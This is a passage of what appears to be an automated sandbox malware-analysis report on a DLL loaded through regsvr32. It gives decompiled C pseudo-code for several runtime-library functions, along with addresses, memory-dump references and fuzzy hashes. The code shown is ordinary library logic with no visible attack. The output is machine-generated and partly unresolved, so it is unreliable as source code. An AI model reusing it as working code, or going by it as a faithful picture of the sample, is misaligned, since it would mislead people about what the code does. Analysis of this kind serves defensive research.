                                                                                                0x180002bf2
                                                                                                0x180002bfc
                                                                                                0x180002c07
                                                                                                0x180002c12
                                                                                                0x180002c14
                                                                                                0x180002c1a
                                                                                                0x180002c1f
                                                                                                0x180002c27
                                                                                                0x180002c2c
                                                                                                0x180002c31
                                                                                                0x180002c33
                                                                                                0x180002c3b
                                                                                                0x180002c3f
                                                                                                0x180002c49
                                                                                                0x180002c52
                                                                                                0x180002c7a

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                • String ID: csm$f
                                                                                                • API String ID: 2395640692-629598281
                                                                                                • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                0x1800077fc
                                                                                                0x180007801
                                                                                                0x180007810
                                                                                                0x180007818
                                                                                                0x18000781d
                                                                                                0x180007824
                                                                                                0x180007829
                                                                                                0x18000782c
                                                                                                0x180007833
                                                                                                0x180007836
                                                                                                0x180007838
                                                                                                0x18000783d
                                                                                                0x18000783f
                                                                                                0x180007844
                                                                                                0x180007847
                                                                                                0x180007849
                                                                                                0x18000784d
                                                                                                0x18000784f
                                                                                                0x180007854
                                                                                                0x18000785b
                                                                                                0x180007860
                                                                                                0x180007863
                                                                                                0x180007865
                                                                                                0x180007869
                                                                                                0x18000786b
                                                                                                0x180007870
                                                                                                0x180007876
                                                                                                0x18000787d
                                                                                                0x180007882
                                                                                                0x180007885
                                                                                                0x180007889
                                                                                                0x18000788b
                                                                                                0x180007890
                                                                                                0x180007897
                                                                                                0x1800078b5

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _set_statfp
                                                                                                • String ID:
                                                                                                • API String ID: 1156100317-0
                                                                                                • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value
                                                                                                • String ID:
                                                                                                • API String ID: 3702945584-0
                                                                                                • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value
                                                                                                • String ID:
                                                                                                • API String ID: 3702945584-0
                                                                                                • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}















                                                                                                0x180003800
                                                                                                0x180003803
                                                                                                0x180003807
                                                                                                0x18000380b
                                                                                                0x18000381a
                                                                                                0x18000381e
                                                                                                0x180003834
                                                                                                0x180003836
                                                                                                0x18000383b
                                                                                                0x180003848
                                                                                                0x18000384c
                                                                                                0x180003855
                                                                                                0x18000385e
                                                                                                0x180003867
                                                                                                0x180003870
                                                                                                0x180003874
                                                                                                0x180003884
                                                                                                0x18000388c
                                                                                                0x180003891
                                                                                                0x180003896
                                                                                                0x18000389b
                                                                                                0x1800038a2
                                                                                                0x1800038be

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 3544855599-2084237596
                                                                                                • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 32%
                                                                                                			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0xeaed15642a89
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

















































                                                                                                0x18000d5b8
                                                                                                0x18000d5c6
                                                                                                0x18000d5ca
                                                                                                0x18000d5d1
                                                                                                0x18000d5d9
                                                                                                0x18000d5dd
                                                                                                0x18000d5e7
                                                                                                0x18000d5ee
                                                                                                0x18000d5f5
                                                                                                0x18000d5fc
                                                                                                0x18000d606
                                                                                                0x18000d60a
                                                                                                0x18000d618
                                                                                                0x18000d624
                                                                                                0x18000d629
                                                                                                0x18000d62d
                                                                                                0x18000d630
                                                                                                0x18000d633
                                                                                                0x18000d63d
                                                                                                0x18000d64a
                                                                                                0x18000d64f
                                                                                                0x18000d65c
                                                                                                0x18000d65f
                                                                                                0x18000d664
                                                                                                0x18000d667
                                                                                                0x18000d66e
                                                                                                0x18000d677
                                                                                                0x18000d67b
                                                                                                0x18000d683
                                                                                                0x18000d686
                                                                                                0x18000d689
                                                                                                0x18000d69c
                                                                                                0x18000d6af
                                                                                                0x18000d6ba
                                                                                                0x18000d6be
                                                                                                0x18000d6c8
                                                                                                0x18000d6cd
                                                                                                0x18000d6e1
                                                                                                0x18000d6ea
                                                                                                0x18000d6f0
                                                                                                0x18000d6f2
                                                                                                0x18000d6fc
                                                                                                0x18000d702
                                                                                                0x18000d708
                                                                                                0x18000d71d
                                                                                                0x18000d72a
                                                                                                0x18000d72f
                                                                                                0x18000d73b
                                                                                                0x18000d740
                                                                                                0x18000d74b
                                                                                                0x18000d759
                                                                                                0x18000d764
                                                                                                0x18000d766
                                                                                                0x18000d76a
                                                                                                0x18000d76e
                                                                                                0x18000d77b
                                                                                                0x18000d77d
                                                                                                0x18000d780
                                                                                                0x18000d783
                                                                                                0x18000d794
                                                                                                0x18000d79d
                                                                                                0x18000d7ab
                                                                                                0x18000d7ae
                                                                                                0x18000d7b6
                                                                                                0x18000d7bf
                                                                                                0x18000d7ca
                                                                                                0x18000d7d0
                                                                                                0x18000d7d6
                                                                                                0x18000d7da
                                                                                                0x18000d7e6
                                                                                                0x18000d7e8
                                                                                                0x18000d7eb
                                                                                                0x18000d7ee
                                                                                                0x18000d7f3
                                                                                                0x18000d7ff
                                                                                                0x18000d808
                                                                                                0x18000d80e
                                                                                                0x18000d811
                                                                                                0x18000d814
                                                                                                0x18000d818
                                                                                                0x18000d81d
                                                                                                0x18000d825
                                                                                                0x18000d82d
                                                                                                0x18000d834
                                                                                                0x18000d839
                                                                                                0x18000d83f
                                                                                                0x18000d844
                                                                                                0x18000d84e
                                                                                                0x18000d850
                                                                                                0x18000d860
                                                                                                0x18000d862
                                                                                                0x18000d86a
                                                                                                0x18000d873
                                                                                                0x18000d888
                                                                                                0x18000d88e
                                                                                                0x18000d891
                                                                                                0x18000d8a0
                                                                                                0x18000d8a8
                                                                                                0x18000d8ae
                                                                                                0x18000d8b1
                                                                                                0x18000d8b6
                                                                                                0x18000d8bb
                                                                                                0x18000d8c3
                                                                                                0x18000d8c7
                                                                                                0x18000d8cc
                                                                                                0x18000d8cf
                                                                                                0x18000d8d8
                                                                                                0x18000d8dd
                                                                                                0x18000d8e2
                                                                                                0x18000d8e8
                                                                                                0x18000d8f1
                                                                                                0x18000d907
                                                                                                0x18000d915
                                                                                                0x18000d91c
                                                                                                0x18000d926
                                                                                                0x18000d92d
                                                                                                0x18000d931
                                                                                                0x18000d93a
                                                                                                0x18000d93a
                                                                                                0x18000d93e
                                                                                                0x18000d94d
                                                                                                0x18000d957
                                                                                                0x18000d95d
                                                                                                0x18000d960
                                                                                                0x18000d96a
                                                                                                0x18000d97b
                                                                                                0x18000d983
                                                                                                0x18000d985
                                                                                                0x18000d997
                                                                                                0x18000d9a7
                                                                                                0x18000d9a9
                                                                                                0x18000d9ac
                                                                                                0x18000d9b1
                                                                                                0x18000d9b3
                                                                                                0x18000d9c8
                                                                                                0x18000d9cf
                                                                                                0x18000d9d8
                                                                                                0x18000d9da
                                                                                                0x18000d9de
                                                                                                0x18000d9e0
                                                                                                0x18000d9ed
                                                                                                0x18000d9f3
                                                                                                0x18000d9f6
                                                                                                0x18000d9f9
                                                                                                0x18000da01
                                                                                                0x18000da2c

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
